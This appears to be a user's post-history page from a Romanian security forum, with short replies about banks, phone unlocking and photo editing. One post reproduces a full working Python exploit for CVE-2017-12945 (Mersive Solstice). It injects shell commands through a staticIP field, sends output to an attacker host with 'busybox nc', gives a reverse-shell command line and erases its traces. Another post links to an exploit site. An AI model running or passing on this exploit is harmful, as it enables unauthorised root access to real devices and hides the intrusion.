Vasile.
Active Members-
Posts
123 -
Joined
-
Days Won
2
Everything posted by Vasile.
-
Up
-
Schimba fontul Tu vrei baza de date python in GUI
-
Salut, imi poate decoda cineva telefon: Name: Nokia Lumia 610 Carrier: Vodafone SW variant ID227 v.20 Software: Windos * Phone 7.5 Codat pe reteaua Vodafone Italia Imei: priate message Ofer 10 euro transfer sms
-
Cum ți se fură banii din cont când plătești cu cardul la hotel
Vasile. replied to Nytro's topic in Stiri securitate
Cine are bani de cazare in hotel, nu cred ca are Miceosoft Office 2007 "Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows " -
Bun, stii cum pot afla locatia dispositivului "tată" de pe dispozitivul "mamă"? In caz ca "tata" e pierdut Dupe ip ceva, 10x
-
Este pe cn.0day.today cea mai 9 veraiune, nu reusesc de pe tel Edit: CVE 2017-19245 https://cn.0day.today/exploit/33596
-
# Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution # Google Dork: N/A # Date: 2016-12-23 # Exploit Author: Alexandre Teyar # Vendor Homepage: https://www2.mersive.com/ # Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk # Versions: 2.8.0 # Tested On: Mersive Solstice 2.8.0 # CVE: CVE-2017-12945 # Description : This will exploit an (authenticated) blind OS command injection # vulnerability present in Solstice devices running versions # of the firmware prior to 2.8.4. # Notes : To get the the command output (in piped-mode), a netcat listener # (e.g. 'nc -lkvp <LPORT>') needs to be launched before # running the exploit. # To get an interactive root shell use the following syntax # 'python.exe .\CVE-2017-12945.py -pass <PASSWORD> # -rh <RHOST> -p "busybox nc <LHOST> <LPORT> # -e /system/bin/sh -i"'. #!/usr/bin/env python3 import argparse import logging import requests import sys import time def parse_args(): """ Parse and validate the command line supplied by users """ parser = argparse.ArgumentParser( description="Solstice Pod Blind Command Injection" ) parser.add_argument( "-d", "--debug", dest="loglevel", help="enable verbose debug mode", required=False, action="store_const", const=logging.DEBUG, default=logging.INFO ) parser.add_argument( "-lh", "--lhost", dest="lhost", help="the listening address", required=False, type=str ) parser.add_argument( "-lp", "--lport", dest="lport", help="the listening port - default 4444", required=False, default="4444", type=str ) parser.add_argument( "-p", "--payload", dest="payload", help="the command to execute", required=True, type=str ) parser.add_argument( "-pass", "--password", dest="password", help="the target administrator password", required=False, default="", type=str ) parser.add_argument( "-rh", "--rhost", dest="rhost", help="the target address", required=True, type=str ) return parser.parse_args() def main(): try: args = parse_args() lhost = args.lhost lport = args.lport password = args.password rhost = args.rhost logging.basicConfig( datefmt="%H:%M:%S", format="%(asctime)s: %(levelname)-8s %(message)s", handlers=[logging.StreamHandler()], level=args.loglevel ) # Redirect stdout and stderr to <FILE> # only when the exploit is launched in piped mode if lhost and lport: payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1" logging.info( "attacker listening address: {}:{}".format(lhost, lport) ) else: payload = args.payload logging.info("solstice pod address: {}".format(rhost)) if password: logging.info( "solstice pod administrator password: {}".format(password) ) # Send the payload to be executed logging.info("sending the payload...") send_payload(rhost, password, payload) # Send the results of the payload execution to the attacker # using 'nc <LHOST> <LPORT> < <FILE>' then remove <FILE> if lhost and lport: payload = ( "busybox nc {} {} < /data/local/tmp/rce.tmp ".format( lhost, lport ) ) logging.info("retrieving the results...") send_payload(rhost, password, payload) # Erase exploitation traces payload = "rm -f /data/local/tmp/rce.tmp" logging.info("erasing exploitation traces...") send_payload(rhost, password, payload) except KeyboardInterrupt: logging.warning("'CTRL+C' pressed, exiting...") sys.exit(0) def send_payload(rhost, password, payload): URL = "http://{}/Config/service/saveData".format(rhost) headers = { "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest", "Referer": "http://{}/Config/config.html".format(rhost) } data = { "m_networkCuration": { "ethernet": { "dhcp": False, "staticIP": "; {}".format(payload), "gateway": "", "prefixLength": 24, "dns1": "", "dns2": "" } }, "password": "{}".format(password) } # Debugging using the BurpSuite # proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'https://127.0.0.1:8080' # } try: logging.info("{}".format(payload)) response = requests.post( URL, headers=headers, # proxies=proxies, json=data ) logging.debug( "{}".format(response.json()) ) # Wait for the command to be executed time.sleep(2) except requests.exceptions.RequestException as ex: logging.error("{}".format(ex)) sys.exit(0) if __name__ == "__main__": main() Source: https://www.exploit-db.com/exploits/47722
- 1 reply
-
- 1
-
Mamă sa nu spui ca era acela uid0, il foloseam si eo Nologin mai ai?
-
Ce model? Era in titlu, sorry Vezi pe aici, poate te ajuta https://www.e-camere.ro/articol/Probleme-cu-DVR-m-ul-Dahua-(Hacked)-qm--Se-rezolva-cu-un-upgrade-de-firmware/ Upgrade firmware
-
Ete root-uri cate vrei Rrtfm 👹 din dragoste pentru diavola
-
Pai si tineye ce-ti spune?
-
Exista, ceva gen vrei cum jucam tetris pe vremuri? https://www.123rf.com/photo_97578553_cheerful-brunette-woman-in-sweater-showing-thumb-up-and-holding-credit-card-while-winks-and-looking-.html?vti=n6v0vxyj4qw458e0dk-1-24 Photoshop Apropo, poza e poza, imaginea e imagine, exprima-te corect sa inteleaga tot prostul, Diferenta este ca poza e imprimata, iar imaginea este digitala, un fel de analog si digital, stiice zic?
-
Incearca la băncile din Elveția https://corporatefinanceinstitute.com/resources/careers/companies/banks-in-switzerland/
-
Bun, multumesc, am sa trimit e-mail si la HCMR. Revenind la subiect sunt praf sucursalele, ai bani ii tii safe, nu la indieni
-
Nu aveam pattern pe tel, numai cu uber cat m-am plimbat cu Monzo si Monese
-
Ti-l blocheaza imediat, dar nu stau nH pe chat sa ii conving, majoritatea bancilor mari au suport 24/24, 7/7 in h-urile alea cat comunici pe ei in chat, se fac cumparaturi, in primul rand nu au limita Edit/ nu mananc cacat qoi, spun din propria experienta, tot salariul mi-a fost scamat, de catre ei
-
Dude, nu stiu daca esti ironic sau nu, mi-am pierdut telefonul pe care erau instalate app, si nu au mai fost de gasit, le-am dat si nr de tel, La BRD, BCR, Halifax, Americanexpress, etc.. te duci cu ID-ul, suni la orice h din zi sau din noapte il blochezi, nu tre sa stai ore pe chat In al ii-lea rand nu au 2FA, trompetele astea de asa numite banci, cu sucursalele prin fundul curții Iii: scrie in watermark pe maps (C) 2019?
-
Ti-l inchide man, revolut din cate stiu sunt afiliati cu monese, sunt 'banci' ambulate deschise de indieni in coltul strazii, am fost personal la adresa mentionata de ei in uk, nu era nimic, lucreaza de prin rulote Edit:// daca platesti taxe si impozite, nu faci spalari dde bani, exista bcr, bnr, etc, nu ai de ce sa te temi
-
Incearca cu acte de student, oricum gasesti giveaway , il faci pe numele lu fitu si bagi NFC Edit:// vezi aici https://rstforums.com/forum/search/?q=Ratb
-
Ramai fara bani, am avut la Monzo cateva miare de £, cand am incercat sa fac withdraw am ramas fara card, au sediile in apartemente confort 3.